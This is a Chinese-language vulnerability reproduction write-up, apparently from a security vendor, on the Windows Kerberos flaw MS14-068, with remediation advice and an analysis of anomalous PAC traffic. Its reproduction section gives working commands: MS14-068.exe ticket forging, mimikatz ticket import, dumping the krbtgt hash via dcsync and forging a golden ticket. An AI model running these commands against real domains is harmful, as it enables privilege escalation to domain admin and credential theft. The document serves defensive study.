MS14-068漏洞可谓是威力无穷，在域渗透中，第一步就是应该检测域控是否有这个漏洞，一旦域控没有打上这个补丁，将会使内网渗透变得十分简单。对于内网安全问题，聚铭网络也一直进行跟踪守护，切实协助企业组织做好网络安全防护建设工作，规避安全风险。

一、漏洞描述

远程权限提升漏洞存在于Microsoft windows的Kerberos KDC实现中。存在该漏洞的症状是，Microsoft Kerberos KDC实现无法正确验证签名，这可能造成Kerberos服务票证的某些方面被人伪造。简单来说就是一个域内的普通账户可以利用此漏洞进行权限提升，升级为域管理员权限。

二、受影响版本

Microsoft Windows Windows Server 2012 GoldR2

Microsoft Windows Windows Server 2012 Gold

Microsoft Windows Windows 7 SP1

Microsoft Windows Vista SP2

Microsoft Windows Server 2012 R2

Microsoft Windows Server 2008 SP2

Microsoft Windows Server 2003 SP2

Microsoft Windows 8.1

Microsoft Windows 8

 

三、漏洞利用前提

域控没有打MS14-068补丁，攻击者拿下了一台域内的普通计算机并获得普通域用户以及密码/hash值以及用户suid。

四、漏洞复现

1.搭建环境

域控制器：windows 2008 r2域内主机：windows 7MS14-068.exemimikatz工具

2.漏洞利用

1）查看域控是否有MS14-068这个漏洞，利用命令systeminfo，查看是否打补丁（KB3011780）,下图中没有看到打MS14-068相关漏洞的补丁。

 

2）登陆域内主机利用whoami/all查看自己的用户名以及sid

 

3）利用MS14-068.exe生成一个新的票据：MS14-068.exe -u user@domain -s sid -d域控ip -p密码（出现报错的话一般是密码错误）

 

4）查看dir \域控计算机名称c$

 

5）利用mimikatz先清除票据，再导入刚刚制作新的票据

(1) Kerberos::purge #清除票据

(2) Kerberos::list #列出票据

(3) Kerberos::ptc 票据位置 #导入票据

 

6）复现成功。再次利用dir \域控计算机名称c$，发现提升到管理员权限，表明复现成功。

 

7）黄金票据伪造

a.查看用户krbtgt的hash：

lsadump:dcsync /domain:域名 /all /csv

 

查看用户的sid：

lsadump:dcsync /domain:域名 /user:krbtgt

 

b.制造票据

Kerberos::golden /admin:system /domain:域名 /sid :.... /krbtgt:...(hash) /ticket:票据名称

 

c.导入票据

Kerberos::purge

Kerberos::ptt 票据名称

 

d.复现成功

利用dir \域控名称c$,出现目录，表示成功。

 

五、修复方案

1. 升级补丁

与此同时，请及时做好自查和预防工作，以免遭受黑客攻击。

六、复现过程中的异常流量分析

1.正常流量

 

2.异常流量分析

Client在发起认证请求时，通过设置include-PAC为False，则返回TGT中不会包含PAC。

• AS-REQ身份认证阶段

 

• 票据授予阶段TGS-REQ

 

• 总结：正常和异常流量的区别在于pac的配置上的异常

异常流量在1.AS-REQ阶段终端设置了pac为false

正常流量在1.AS-REQ阶段终端设置了pac为true

异常流量在3.TGS-REQ阶段终端又多了一个pac的设置，且值为false

正常流量在3.TGS-REQ阶段终端没有关于pac 的设置